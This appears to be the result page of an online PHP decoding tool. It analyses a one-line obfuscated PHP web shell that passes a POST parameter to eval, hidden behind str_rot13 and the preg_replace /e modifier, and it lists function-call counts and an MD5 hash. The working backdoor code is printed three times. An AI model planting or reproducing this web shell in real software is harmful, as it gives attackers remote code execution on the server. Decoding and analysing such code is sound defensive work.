Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php ($b = $_POST['c']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b)', 'add');?>..
Decoded Output download
<?php ($b = $_POST['c']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b)', 'add');?>
Did this file decode correctly?
Original Code
<?php ($b = $_POST['c']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b)', 'add');?>
Function Calls
| str_rot13 | 1 |
| preg_replace | 1 |
Stats
| MD5 | 39d841f5192407717461fd1b1d0cd705 |
| Eval Count | 1 |
| Decode Time | 109 ms |